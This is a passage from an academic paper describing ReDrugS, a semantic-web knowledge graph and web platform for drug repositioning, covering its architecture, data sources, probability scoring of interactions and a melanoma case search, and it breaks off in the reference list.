large scale computational screens that use network connectivity (Yang & Agarwal, 2011; Wu, Wang & Chen, 2013; Cheng et al., 2012; Emig et al., 2013; Harrold, Ramanathan & Mager, 2013; Wu et al., 2013; Vogt, Prinz & Campillos, 2014), the complementarity in drug-disease gene expression, and the similarity of chemical fingerprints, side-effects, targets, or indications (Yang & Agarwal, 2011; Ye, Liu & Wei, 2014; Chiang & Butte, 2009; Gottlieb et al., 2011; Lamb et al., 2006; Sirota et al., 2011). Importantly, since we focus on protein networks that are strongly linked with diseases, we believe that our mechanism focused approach will also aid in the identification of disease-modifying drug candidates, rather than solely those that would be useful for the treatment of symptomatic phenotypes or related co-morbid conditions. Architecture ReDrugS uses a fairly straightforward web architecture, as shown in Fig. 4. It uses the Blazegraph RDF database backend. The database layer is interchangeable except that the full text search service needs to use Blazegraph-only properties to perform text searches as text indexing is not yet standardized in the SPARQL query language. All other aspects are standardized and should work with other RDF databases without modification. ReDrugs currently uses the Python-based TurboGears web application framework hosted using the web services gateway interface standard via an Apache HTTP server. TurboGears in turn hosts the semantic automated discovery and integration (SADI) web services that drive the application and access the database. It also serves up the static HTML and supporting files. RDF Store Python + Apache Web Server /api/search /api/upstream /api/downstream Javascript Web Client Cytoscape.js Javascript Web Client SPARQL JSON-LD Figure 4 The ReDrugS software architecture. Using web standards and a three-layer architecture (RDF store, web server, and rich web client), we were able to build a complete knowledge graph analysis platform. McCusker et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.106 7/20 http://dx.doi.org/10.7717/peerj-cs.106 https://peerj.com/computer-science/ The user interface is implemented with AngularJS and Cytoscape.js, which submits queries to the SADI web services using JSON-LD and aggregates results into the networked view. The software relies exclusively on standardized protocols (HTTP, SADI, SPARQL, RDF, and others) to make it simple to replace technologies as needed. The data itself is processed using conversion scripts as shown in Fig. 5. We have also adapted and featured ReDrugS in an immersive visualization laboratory called the collaborative-research augmented immersive virtual environment (CRAIVE) lab at RPI, as shown in Fig. 6. The goal of the demonstration was to explore new ways to visualize, sonify, and interact with big data in large-scale virtual reality systems. We also leveraged a gesture controller (Microsoft kinect) to interact with the visualization. With the 360� projection, multiple people can explore the visualization concurrently, which accelerates the exploration and discovery speed. Limitations and future work Our study has a some limitations. First, our study is limited by the sources of data used. We used three databases (DrugBank, iRefIndex, and online Mendelian inheritance in man (OMIM)) to construct the initial knowledge graph. These databases are continuously changing and necessarily incomplete with respect to the total number of drugs, targets, protein interactions, diseases, and disease genes. For instance, as of 8/15/2016 there are over 2,000 additional FDA approved drugs in DrugBank than in the version that was initially used. Second, the focus of our work is on the potential repositioning of FDA ReDrugS API Interaction network search and expansion iRefIndex ReDrugS RDF Store Analytical Tools ReDrugS Cytoscape.js App Ontological Resources Protein/Protein Interaction Ontology, Semanticscience Integrated Ontology, Gene Ontology vocabularies, relationships queries queries graphqueries graph II Experimental Method Assessment experimental methods. evidence to probabilityconverted to nanopubs Cytoscape, R, Python, etc. Figure 5 The ReDrugS data flow. Data is selected from external databases and converted using scripts into nanopublication graphs, which are loaded into the ReDrugS data store. This is combined with experimental method assessments, expressed in OWL, and public ontologies into the RDF store. The web service layer queries the store and produces aggregate analyses of those nanopublications, which is con- sumed and displayed by the rich web client. The same APIs can be used by other tools for further analysis. McCusker et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.106 8/20 http://dx.doi.org/10.7717/peerj-cs.106 https://peerj.com/computer-science/ approved drugs, which means that tens of thousands of chemical compounds with protein binding activity cannot be considered as candidates in the current study. Third, our path expansion is currently limited to pairwise protein–protein interactions, which excludes interactions as a result of protein complexes or regulatory pathways. Having a more sophisticated understanding of non-direct interactions will help identify candidate drugs that can regulate entire pathways in a more rational manner. Additionally, we aim to incorporate knowledge of the complementarity of drug and disease gene expression patterns as evidenced by the connectivity map (Lamb et al., 2006), which could suggest therapeutic and adverse interactions. Finally, as we develop new hypotheses about potential new drug effects, we plan to test them using a new three-dimensional cellular microarray to perform high-throughput drug screening (Lee et al., 2008) with reference samples. The integration of computational predictions and high-throughput screening platform will enable the systematic evaluation of any drug or mechanism of action against any disease or adverse event. MATERIALS AND METHODS This research project did not involve human subjects. The ReDrugS platform consists of a graphical web application, an application programming interface (API), and a knowledge base. The graphical web application enables users to initiate a search using drug, gene, and disease names and synonyms. Users can then interact with the application to expand the network at an arbitrary number of interactions away from the entity of interest, and to filter the network based on a joint probability between the source and target entities. Drug–protein, protein–protein, and gene–disease interactions were obtained from several datasets and integrated into ontology-annotated and provenance and evidence bearing representations called nanopublications. The web application obtains information from the knowledge base using semantic web services. Finally, we evaluated our approach by Figure 6 The authors demonstrate the ReDrugS user interface in the collaborative-research augmented immersive virtual environment (CRAIVE) lab at RPI. McCusker et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.106 9/20 http://dx.doi.org/10.7717/peerj-cs.106 https://peerj.com/computer-science/ examining the mechanistic plausibility of the drug in having melanoma-specific disease modifying ability. We evaluated a large number of possible drug/disease associations with varying joint probabilities and interaction steps to determine the thresholds with the highest f-measure, resulting in our thresholds of three or less interactions and a joint probability of 0.93 or higher. Using the ReDrugS application page (http://redrugs.tw.rpi.edu) we initiate our search for “melanoma,” and select the first suggestion obtained from the experimental factor ontology (EFO) (http://www.ebi.ac.uk/efo/EFO_0000756). The application then provides immediate neighborhood of drugs and genes that are associated with melanoma. We expanded the network by first selecting the melanoma node and expanding the link distance to |I| � 3 and changing the minimum joint probability to p � 0.93 in the search options. Importantly, we also limit the node type to “Drug.” Finally, we click on the “find incoming links” button (two left-facing arrows). When finished the network will show all drugs interacting with melanoma that meet the above criteria, as well as any intervening entities and their interactions. The resulting network can be downloaded as an image, or a summary CSV file. We used the CSV file to validate the links by searching Google Scholar and ClinicalTrials.gov for each proposed drug/disease combination. We consider a “hit” to be a pairing with a published positive experiment in vivo or in vitro or any pairing that has been tested in a clinical trial. While this level of validation does not guarantee efficacy, it does determine if the resulting connection is a plausible hypothesis that might be tested. Data fusion We developed a structured knowledge base containing data pertaining to drugs, targets, interactions, and diseases. We used five data sources: iRefIndex (Razick, Magklaras & Donaldson, 2008), DrugBank (Wishart et al., 2006), UniProt gene ontology annotations (GOA) (Camon et al., 2004), the online Mendelian inheritance in man (OMIM) (Hamosh et al., 2005), and the catalogue of somatic mutations in cancer (COSMIC) gene census (Futreal et al., 2004). iRefIndex contains protein–protein interactions and protein complexes and is an amalgam of the biomolecular interaction network database (Bader, Betel & Hogue, 2003), BioGRID (Stark et al., 2006), the comprehensive resource of mammalian protein complexes (Ruepp et al., 2010), database of interacting proteins (Xenarios et al., 2002), human protein reference database (Keshava Prasad et al., 2009), InnateDB (Lynn et al., 2008), IntAct (Kerrien et al., 2011), MatrixDB (Chautard et al., 2011), molecular interaction database (Chatr-aryamontri et al., 2008), MPact (Güldener et al., 2006), microbial protein interaction database (Goll et al., 2008), MIPS mammalian protein–protein interaction database (Pagel et al., 2005), and online predicted human interaction database (Brown & Jurisica, 2005). DrugBank provides information about experimental/approved drugs and their targets, and UniProt GOA describes proteins in terms of their biological processes, cellular locations, and molecular functions. OMIM provides associations between genes and inherited or genetically-driven diseases. The COSMIC gene census is a curated list of genes that have causal associations with one or more cancer types. McCusker et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.106 10/20 http://redrugs.tw.rpi.edu http://www.ebi.ac.uk/efo/EFO_0000756 http://dx.doi.org/10.7717/peerj-cs.106 https://peerj.com/computer-science/ Each association (e.g., drug–target, protein–protein, disease–gene) was captured using the nanopublication (Groth, Gibson & Velterop, 2010) scheme. A nanopublication is a digital artifact that consists of an assertion, its provenance, and information about the digital publication. Our nanopublications are represented as linked data: each data item is identified using an dereferenceable HTTP uniform resource identifier (URI) and statements are represented using the RDF. Each nanopublication corresponds to a single interaction assertion from one of the databases. We used a number of automated scripts to produce the nanopublications and load them into the SPARQL endpoint. An example nanopublication is shown in Fig. 7. We used the SIO (Dumontier et al., 2014) as a global schema to describe the nature and components of the associations, and coupled this with the PSI-MI ontology (Hermjakob et al., 2004) to denote the types of interactions. We used the W3C’s PROV-O (Lebo, Sahoo & McGuinness, 2013) to capture provenance of the assertion (which data source it originated from). We loaded our nanopublications into Blazegraph, an RDF nanopublication compatible database. The data is accessed using its native SPARQL endpoint by the web application. Assertion probability Each knowledge graph fragment, enclosed in a nanopublication, is assigned a probability based on the quality of the methods used to create the assertions in the fragment. We compute probabilities based on two different methods. Manually curated assertions, from DrugBank, OMIM, and COSMIC gene census, are directly given a probability p = 0.999. Assertions that have been derived from a specific experimental method are given probabilities appropriate for that method. These probabilities are derived from a expert-driven measure of the reliability of the experimental method used to derive the association. Factors involved in the assessment of confidence include the degree of indirection in the assay, the sensitivity and specificity of the approach, and reproducibility of results under different conditions based on the comparative analyses of techniques (Skrabanek et al. 2008; Sprinzak, Sattath & Margalit, 2003). Two expert bioinformaticians rated the reliability of each method and assigned a score of 1–3, where 1 corresponds to low confidence and 3 to high confidence. After their initial assessment, they conferred on their reasoning for each score to resolve differences where possible. The experts considered level 1 to correspond to weak evidence that needs independent verification. Level 2 methods are generally reliable, but should have additional biological evidence. Level 3 methods are high-quality method that produces few false positives. We calculated inter-annotator agreement between the two annotators over the three categories using Scott’s Pi. Scott’s Pi is similar to Cohen’s kappa in that it improves on simple observed agreement by factoring in the extent of agreement that might be expected by chance. We determined the agreement to be 0.56 (Scott’s Pi value of 0.26) across 104 experimental methods comprising of 99.9999% of interaction annotations (Scott, 1955). The scores of 1, 2, and 3 were then assigned provisional probabilities of p = 0.8, p = 0.95, and p = 0.99 respectively. We chose these probabilities as approximations of the conceptual levels of probability for each rating by the experts, and feel that those probabilities correspond to how often an experiment at that confidence level can be expected to be McCusker et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.106 11/20 http://dx.doi.org/10.7717/peerj-cs.106 https://peerj.com/computer-science/ accurate. We plan to provide a more rigorous assessment of the accuracy of each method against gold standards in future work. These confidence values were encoded into an OWL ontology along with the evidence codes. The full inferences were extracted using Pellet (https://github.com/complexible/pellet) and loaded into the SPARQL endpoint, where they were used to apply the probabilities to each assertion in the knowledge graph that had experimental evidence. Semantic web services We developed four SADI web services (Wilkinson, Vandervalk & McCarthy, 2009) in Python 1 to support easy access to the nanopubications (see Table 2) in ReDrugS. The four services are enumerated in Table 2. The first service is a simple free text lookup, that takes an pml:Query 2 (McGuinness et al., 2007) with a prov:value as a query and produces a set of entities whose labels contain the substring. This is used for interactive typeahead completion of search terms so users can look up URIs and entities without needing to know the details. The other three SADI services look up interactions that contain a named entity. Two of them look at the entity to find upstream and downstream connections, and the third service assumes that the entity is a biological process and finds all interactions that related to that process. The services return only one interaction for each triple (source, interaction type, target). There are often multiple probabilities per interaction, and more than one interaction per interaction type. This is because the interaction may have been recorded in multiple databases, based on different experimental methods. Figure 7 Representation of a protein/protein interaction within a nanopublication. Three graphs are represented. The assertion graph (NanoPub_501799_Assertion), states that an interaction (X) is of type sio:DirectInteraction, and has the target of SLC4A8, and a participant of CA2. The supporting graph (NanoPub_501799_Supporting), states that the assertion graph was generated by a pull down experi- ment (one of many encoded experiment types used in, a subclass of prov:Activity. The attribution graph (NanoPub_501799_Attribution), in turn, states that the assertion had a primary source of (Loiselle et al., 2004) and that the interaction was quoted from BioGrid. 1 For further information on developing web services in Python using SADI, see this tutorial: https://github.com/ markwilkinson/SADI-Semantic-Web- Services-Core/wiki/Building-Services- in-Python 2 PML 3, in development: https://github. com/timrdf/pml. This includes PML 2 constructs that are not covered in PROV-O. McCusker et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.106 12/20 https://github.com/complexible/pellet https://github.com/markwilkinson/SADI-Semantic-Web-Services-Core/wiki/Building-Services-in-Python https://github.com/markwilkinson/SADI-Semantic-Web-Services-Core/wiki/Building-Services-in-Python https://github.com/markwilkinson/SADI-Semantic-Web-Services-Core/wiki/Building-Services-in-Python https://github.com/markwilkinson/SADI-Semantic-Web-Services-Core/wiki/Building-Services-in-Python https://github.com/timrdf/pml https://github.com/timrdf/pml http://dx.doi.org/10.7717/peerj-cs.106 https://peerj.com/computer-science/ To provide a single probability score for each interaction of a source and target, the interactions are combined. A single probability is generated per identified interaction by taking the geometric mean of the probabilities for that interaction. However, this method is undesirable when combining multiple interaction records of the same type. We instead combine the interaction records using a form of probabilistic voting using composite Z-scores. This is done to model that multiple experiments that produce the same results reinforce each other, and should therefore give a higher overall probability than would be indicated by taking their mean or even by Bayes theorem. We do this by converting each probability into a Z-score (aka standard score) using the quantile function (Q()), summing the values, and applying the cumulative distribution function (CDF()) to compute the corresponding probability: P x1...nð Þ ¼ CDF Xn i¼1 Q P xið Þð Þ ! These composite Z-scores, which we transform back into probabilities, are frequently used to combine multiple indicators of the same underlying phenomena, as in (Moller et al., 1998). However, it has a drawback. One concern is that the strategy does not account for multiple databases recording the same non-independent experiment. This can possibly inflating the probabilities of interactions described by experiments that are published in more than one database. Graph expansion using joint probability In order to compute the probability that a given entity affects another, we compute the joint probability that each of the intervening interactions are true. Joint probability is the probability that every assertion in the set is true. This is computed by taking the product of probabilities of each interaction: P x1 ^ . . . ^ xnð Þ ¼ Yn i¼1 P xið Þ This joint probability is used as a threshold that users can set to stop graph expansion. We also provide expansion limits using the number of interaction steps that are needed to connect the two entities. Table 2 ReDrugS API SADI Web Services. The API endpoint prefix is http://redrugs.tw.rpi.edu/api/. Service name Description URL Input Output Resource text search Look up resources using free text search against their RDFS labels. This service is optimized for typeahead user interfaces. search pml:Query pml:AnsweredQuery Find interactions in a biological process Find interactions whose participants or targets also participate in the input process. process sio:Process sio:Process Find upstream participants Find interactions that the input entity is a target of in and have explicit participants. upstream sio:MaterialEntity sio:Target Find downstream targets Find interactions that the input entity participates in and have explicit targets. downstream sio:MaterialEntity sio:Agent McCusker et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.106 13/20 http://redrugs.tw.rpi.edu/api/ http://dx.doi.org/10.7717/peerj-cs.106 https://peerj.com/computer-science/ User interface The user interface was developed using the above SADI web services and uses Cytoscape.js (http://cytoscape.github.io/cytoscape.js) angular.js (https://angularjs.org), and Bootstrap 3 (http://getbootstrap.com). An example network is shown in Fig. 2. Users can search for biological entities and processes, which can then be autocompleted to specific entities that are in the ReDrugS graph. Users can then add those entities and processes to the displayed graph and retrieve upstream and downstream connections and link out to more details for every entity. Cytoscape.js is used as the main rendering and network visualization tool, and provides node and edge rendering, layout, and network analysis capabilities, and has been integrated into a customized rich web client. In order to evaluate this knowledge graph, we developed a demonstration web interface (http://redrugs.tw.rpi.edu) based on the Cytoscape.js (http://cytoscape.github.io/ cytoscape.js) JavaScript library. The interface lets users enter biological entity names. As the user types, the text is resolved to a list of entities. The user finishes by selecting from the list, and submitting the search. The search returns interactions and nodes associated with the entity selected, which are added to the Cytoscape.js graph. Users are also able to select nodes and populate upstream or downstream connections. Figure 2 is an example output of this process. ACKNOWLEDGEMENTS A special thanks to Pascale Gaudet who, with Michel Dumontier, evaluated the experimental methods and evidence codes listed in the protein/protein interaction ontology and gene ontology. Thank you also to Kusum Solanki and John Erickson for evaluation, feedback, and planning in the initial stages of this project. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare that they have no competing interests. Author Contributions � James P. McCusker conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. � Michel Dumontier conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, performed the computation work, reviewed drafts of the paper. � Rui Yan performed the experiments, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. McCusker et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.106 14/20 http://cytoscape.github.io/cytoscape.js https://angularjs.org http://getbootstrap.com http://redrugs.tw.rpi.edu http://cytoscape.github.io/cytoscape.js http://cytoscape.github.io/cytoscape.js http://dx.doi.org/10.7717/peerj-cs.106 https://peerj.com/computer-science/ � Sylvia He contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. � Jonathan S. Dordick conceived and designed the experiments, reviewed drafts of the paper. � Deborah L. McGuinness conceived and designed the experiments, wrote the paper, reviewed drafts of the paper. Data Deposition The following information was supplied regarding data availability: Data can be found at https://data.rpi.edu/xmlui/handle/10833/1760. REFERENCES Bader GD, Betel D, Hogue CW. 2003. BIND: the biomolecular interaction network database. Nucleic Acids Research 31(1):248–250 DOI 10.1093/nar/gkg056. Barth A, Wanek L, Morton D. 1995. Prognostic factors in 1,521 melanoma patients with distant metastases. Journal of the American College of Surgeons 181(3):193–201. Bisgin H, Liu Z, Fang H, Kelly R, Xu X, Tong W. 2014. A phenome-guided drug repositioning through a latent variable model. BMC Bioinformatics 15(1):267 DOI 10.1186/1471-2105-15-267. Bisgin H, Liu Z, Kelly R, Fang H, Xu X, Tong W. 2012. Investigating drug repositioning opportunities in FDA drug labels through topic modeling. BMC Bioinformatics 13(Suppl 1):S6 DOI 10.1186/1471-2105-13-s15-s6. Brown KR, Jurisica I. 2005. Online predicted human interaction database. Bioinformatics 21(9):2076–2082 DOI 10.1093/bioinformatics/bti273. Camon E, Magrane M, Barrell D, Lee V, Dimmer E, Maslen J, Binns D, Harte N, Lopez R, Apweiler R. 2004. The gene ontology annotation (GOA) database: sharing knowledge in UniProt with gene ontology. Nucleic Acids Research 32(Suppl 1):D262–D266 DOI 10.1093/nar/gkh021. Chapman PB, Hauschild A, Robert C, Haanen JB, Ascierto P, Larkin J, Dummer R, Garbe C, Testori A, Maio M, Hogg D, Lorigan P, Lebbe C, Jouary T, Schadendorf D, Ribas A, O’Day SJ, Sosman JA, Kirkwood JM, Eggermont AM, Dreno B, Nolop K, Li J, Nelson B, Hou J, Lee RJ, Flaherty KT, McArthur GA. 2011. Improved survival with vemurafenib in melanoma with BRAF V600E mutation. New England Journal of Medicine 364(26):2507–2516. Chatr-aryamontri A, Zanzoni A, Ceol A, Cesareni G. 2008. Searching the protein interaction space through the MINT database. In: Thompson JD, Ueffing M, Schaeffer-Reiss C, eds. Functional Proteomics: Methods and Protocols. Totowa: Humana Press, 305–317 DOI 10.1007/978-1-59745-398-1_20. Chautard E, Fatoux-Ardore M, Ballut L, Thierry-Mieg N, Ricard-Blum S. 2011. MatrixDB, the extracellular matrix interaction database. Nucleic Acids Research 39(Suppl 1):D235–D240 DOI 10.1093/nar/gkq830. Cheng F, Liu C, Jiang J, Lu W, Li W, Liu G, Zhou W, Huang J, Tang Y. 2012. Prediction of drug- target interactions and drug repositioning via network-based inference. PLoS Computational Biology 8(5):e1002503 DOI 10.1371/journal.pcbi.1002503. Chiang AP, Butte AJ. 2009. Systematic evaluation of drug-disease relationships to identify leads for novel drug uses. Clinical Pharmacology and Therapeutics 86(5):507–510 DOI 10.1038/clpt.2009.103. McCusker et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.106 15/20 https://data.rpi.edu/xmlui/handle/10833/1760 http://dx.doi.org/10.1093/nar/gkg056 http://dx.doi.org/10.1186/1471-2105-15-267 http://dx.doi.org/10.1186/1471-2105-13-s15-s6 http://dx.doi.org/10.1093/bioinformatics/bti273 http://dx.doi.org/10.1093/nar/gkh021 http://dx.doi.org/10.1007/978-1-59745-398-1_20 http://dx.doi.org/10.1093/nar/gkq830 http://dx.doi.org/10.1371/journal.pcbi.1002503 http://dx.doi.org/10.1038/clpt.2009.103 http://dx.doi.org/10.7717/peerj-cs.106 https://peerj.com/computer-science/ Clavo A, Wahl R. 1996. Effects of hypoxia on the uptake of tritiated thymidine, L-leucine, L-methionine and FDG in cultured cancer cells. Journal of Nuclear Medicine 37:502–506. D’Alterio C, Barbieri A, Portella L, Palma G, Polimeno M, Riccio A, Ieranò C, Franco R, Scognamiglio G, Bryce J, Luciano A, Rea D, Arra C, Scala S. 2012. Inhibition of stromal CXCR4 impairs development of lung metastases. Cancer Immunology Immunotherapy 61(10):1713–1720 DOI 10.1007/s00262-012-1223-7. Doudican N, Rodriguez A, Osman I, Orlow SJ. 2008. Mebendazole induces apoptosis via Bcl-2 inactivation in chemoresistant melanoma cells. Molecular Cancer Research 6(8):1308–1315 DOI 10.1158/1541-7786.mcr-07-2159. Dumontier M, Baker CJ, Baran J, Callahan A, Chepelev L, Cruz-Toledo J, Del Rio NR, Duck G, Furlong LI, Keath N, Klassen D, McCusker JP, Queralt-Rosinach N, Samwald M, Villanueva-Rosales N, Wilkinson MD, Hoehndorf R. 2014. The semanticscience integrated ontology (SIO) for biomedical research and knowledge discovery. Journal of Biomedical Semantics 5(1):14 DOI 10.1186/2041-1480-5-14. Emig D, Ivliev A, Pustovalova O, Lancashire L, Bureeva S, Nikolsky Y, Bessarabova M. 2013. Drug target prediction and repositioning using an integrated network-based approach. PLoS ONE 8(4):e60618 DOI 10.1371/journal.pone.0060618. Fiorentini G, Aliberti C, Del CA, Tilli M, Rossi S, Ballardini P, Turrisi G, Benea G. 2009. Intra-arterial hepatic chemoembolization (TACE) of liver metastases from ocular melanoma with slow-release irinotecan-eluting beads. Early results of a phase II clinical study. In Vivo 23(1):131–137. Futreal PA, Coin L, Marshall M, Down T, Hubbard T, Wooster R, Rahman N, Stratton MR. 2004. A census of human cancer genes. Nature Reviews Cancer 4(3):177–183 DOI 10.1038/nrc1299. Goll J, Rajagopala SV, Shiau SC, Wu H, Lamb BT, Uetz P. 2008. MPIDB: the microbial protein interaction database. Bioinformatics 24(15):1743–1744 DOI 10.1093/bioinformatics/btn285. Gottlieb A, Stein G, Ruppin E, Sharan R. 2011. PREDICT: a method for inferring novel drug indications with application to personalized medicine. Molecular Systems Biology 7:496 DOI 10.1038/msb.2011.26. Greenberg LH. 1965. Audiotoxicity and nephrotoxicity due to orally administered neomycin. JAMA 194(7):827–828 DOI 10.1001/jama.194.7.827. Groth P, Gibson A, Velterop J. 2010. The anatomy of a nanopublication. Information Services and Use 30(1):51–56. Grover MP, Ballouz S, Mohanasundaram KA, George RA, Sherman CDH, Crowley TM, Wouters MA. 2014. Identification of novel therapeutics for complex diseases from genome- wide association data. BMC Medical Genomics 7(Suppl 1):S8 DOI 10.1186/1755-8794-7-s1-s8. Güldener U, Münsterkötter M, Oesterheld M, Pagel P, Ruepp A, Mewes H-W, Stümpflen V. 2006. MPact: the MIPS protein interaction resource on yeast. Nucleic Acids Research 34(Suppl 1):D436–D441 DOI 10.1093/nar/gkj003. Hamosh A, Scott AF, Amberger JS, Bocchini CA, McKusick VA. 2005. Online Mendelian inheritance in man (OMIM), a knowledgebase of human genes and genetic disorders. Nucleic Acids Research 33(Suppl 1):D514–D517. Harris S, Seaborne A, Prud’hommeaux E. 2013. SPARQL 1.1 query language. W3C Recommendation, 21. Available at https://www.w3.org/TR/sparql11-query/. Harrold JM, Ramanathan M, Mager DE. 2013. Network-based approaches in drug discovery and early development. Clinical Pharmacology and Therapeutics 94(6):651–658 DOI 10.1038/clpt.2013.176. McCusker et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.106 16/20 http://dx.doi.org/10.1007/s00262-012-1223-7 http://dx.doi.org/10.1158/1541-7786.mcr-07-2159 http://dx.doi.org/10.1186/2041-1480-5-14 http://dx.doi.org/10.1371/journal.pone.0060618 http://dx.doi.org/10.1038/nrc1299 http://dx.doi.org/10.1093/bioinformatics/btn285 http://dx.doi.org/10.1038/msb.2011.26 http://dx.doi.org/10.1001/jama.194.7.827 http://dx.doi.org/10.1186/1755-8794-7-s1-s8 http://dx.doi.org/10.1093/nar/gkj003 https://www.w3.org/TR/sparql11-query/ http://dx.doi.org/10.1038/clpt.2013.176 http://dx.doi.org/10.7717/peerj-cs.106 https://peerj.com/computer-science/ Hauschild A, Grob J-J, Demidov LV, Jouary T, Gutzmer R, Millward M, Rutkowski P, Blank CU, Miller WH, Kaempgen E, Martn-Algarra S, Karaszewska B, Mauch C, Chiarion-Sileni V, Martin A-M, Swann S, Haney P, Mirakhur B, Guckert ME, Goodman V, Chapman PB. 2012. Dabrafenib in BRAF-mutated metastatic melanoma: a multicentre open-label, phase 3 randomised controlled trial. Lancet 380(9839):358–365 DOI 10.1016/s0140-6736(12)60868-x. Held MA, Langdon CG, Platt JT, Graham-Steed T, Liu Z, Chakraborty A, Bacchiocchi A, Koo A, Haskins JW, Bosenberg MW, Stern DF. 2012. Genotype-selective combination therapies for melanoma identified by high-throughput drug screening. Cancer Discovery 3(1):52–67 DOI 10.1158/2159-8290.cd-12-0408. Hermjakob H, Montecchi-Palazzi L, Bader G, Wojcik J, Salwinski L, Ceol A, Moore S, Orchard S, Sarkans U, von Mering C, Roechert B, Poux S, Jung E, Mersch H, Kersey P, Lappe M, Li Y, Zeng R, Rana D, Nikolski M, Husi H, Brun C, Shanker K, Grant SGN, Sander C, Bork P, Zhu W, Pandey A, Brazma A, Jacq B, Vidal M, Sherman D, Legrain P, Cesareni G, Xenarios I, Eisenberg D, Steipe B, Hogue C, Apweiler R. 2004. The HUPO PSI’s molecular interaction format—a community standard for the representation of protein interaction data. Nature Biotechnology 22(2):177–183 DOI 10.1038/nbt926. Homsi J, Cubitt CL, Zhang S, Munster PN, Yu H, Sullivan DM, Jove R, Messina JL, Daud AI. 2009. Src activation in melanoma and Src inhibitors as therapeutic agents in melanoma. Melanoma Research 19(3):167–175 DOI 10.1097/cmr.0b013e328304974c. Humer J, Ferko B, Waltenberger A, Rapberger R, Pehamberger H, Muster T. 2008. Azidothymidine inhibits melanoma cell growth in vitro and in vivo. Melanoma Research 18(5):314–321 DOI 10.1097/cmr.0b013e32830aaaa6. Istituto Clinico Humanitas. 2015. Regorafenib in patients with metastatic solid tumors who have progressed after standard therapy (RESOUND). Available at https://clinicaltrials.gov/ct2/ show/NCT02307500 (accessed 10 January 2016). Kerrien S, Aranda B, Breuza L, Bridge A, Broackes-Carter F, Chen C, Duesbury M, Dumousseau M, Feuermann M, Hinz U, Jandrasits C, Jimenez RC, Khadake J, Mahadevan U, Masson P, Pedruzzi I, Pfeiffenberger E, Porras P, Raghunath A, Roechert B, Orchard S, Hermjakob H. 2011. The IntAct molecular interaction database in 2012. Nucleic Acids Research 40:D841–D846 DOI 10.1093/nar/gkr1088. Keshava Prasad TS, Goel R, Kandasamy K, Keerthikumar S, Kumar S, Mathivanan S, Telikicherla D, Raju R, Shafreen B, Venugopal A, Balakrishnan L, Marimuthu A, Banerjee S, Somanathan DS, Sebastian A, Rani S, Ray S, Harrys Kishore CJ, Kanth S, Ahmed M, Kashyap MK, Mohmood R, Ramachandra YL, Krishna V, Rahiman BA, Mohan S, Ranganathan P, Ramabadran S, Chaerkady R, Pandey A. 2009. Human protein reference database—2009 update. Nucleic Acids Research 37(Suppl 1):D767–D772 DOI 10.1093/nar/gkn892. Kim KB, Kefford R, Pavlick AC, Infante JR, Ribas A, Sosman JA, Fecher LA, Millward M, McArthur GA, Hwu P, Gonzalez R, Ott PA, Long GV, Gardner OS, Ouellet D, Xu Y, DeMarini DJ, Le NT, Patel K, Lewis KD. 2012. Phase II study of the MEK1/MEK2 inhibitor trametinib in patients with metastatic BRAF-mutant cutaneous melanoma previously treated with or without a BRAF inhibitor. Journal of Clinical Oncology 31(4):482–489 DOI 10.1200/jco.2012.43.5966. Kim S, Liu Y, Gaber MW, Bumgardner JD, Haggard WO, Yang Y. 2008. Development of chitosan-ellagic acid films as a local drug delivery system to induce apoptotic death of human melanoma cells. Journal of Biomedical Materials Research Part B: Applied Biomaterials 90B(1):145–155 DOI 10.1002/jbm.b.31266. McCusker et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.106 17/20 http://dx.doi.org/10.1016/s0140-6736(12)60868-x http://dx.doi.org/10.1158/2159-8290.cd-12-0408 http://dx.doi.org/10.1038/nbt926 http://dx.doi.org/10.1097/cmr.0b013e328304974c http://dx.doi.org/10.1097/cmr.0b013e32830aaaa6 https://clinicaltrials.gov/ct2/show/NCT02307500 https://clinicaltrials.gov/ct2/show/NCT02307500 http://dx.doi.org/10.1093/nar/gkr1088 http://dx.doi.org/10.1093/nar/gkn892 http://dx.doi.org/10.1200/jco.2012.43.5966 http://dx.doi.org/10.1002/jbm.b.31266 http://dx.doi.org/10.7717/peerj-cs.106 https://peerj.com/computer-science/ Kingsmore SF, Lindquist IE, Mudge J, Gessler DD, Beavis WD. 2008. Genome-wide association studies: progress and potential for drug discovery and development. Nature Reviews Drug Discovery 7(3):221–230 DOI 10.1038/nrd2519. Kraut EH, Walker MJ, Staubus A, Gochnour D, Balcerzak SP. 1997. Phase II trial of topotecan in malignant melanoma. Cancer Investigation 15(4):318–320 DOI 10.3109/07357909709039732. Krauthammer M, Kong Y, Bacchiocchi A, Evans P, Pornputtapong N, Wu C, McCusker J, Ma S, Cheng E, Straub R, Serin M, Bosenberg M, Ariyan S, Narayan D, Sznol M, Kluger H, Mane S, Schlessinger J, Lifton R, Halaban R. 2015. Exome sequencing identifies recurrent mutations in NF1 and RASopathy genes in sun-exposed melanomas. Nature Genetics 47(9):996–1002 DOI 10.1038/ng.3361. Lamb J, Crawford ED, Peck D, Modell JW, Blat IC, Wrobel MJ, Lerner J, Brunet J-P, Subramanian A, Ross KN, Reich M, Hieronymus H, Wei G, Armstrong SA, Haggarty SJ, Clemons PA, Wei R, Carr SA, Lander ES, Golub TR. 2006. The connectivity map: using gene-expression signatures to connect small molecules, genes, and disease. Science 313(5795):1929–1935 DOI 10.1126/science.1132939. Le K, Blomain ES, Rodeck U, Aplin AE. 2013. Selective RAF inhibitor impairs ERK1/2 phosphorylation and growth in mutant NRAS vemurafenib-resistant melanoma cells. Pigment Cell & Melanoma Research 26(4):509–517 DOI 10.1111/pcmr.12092. Lebo 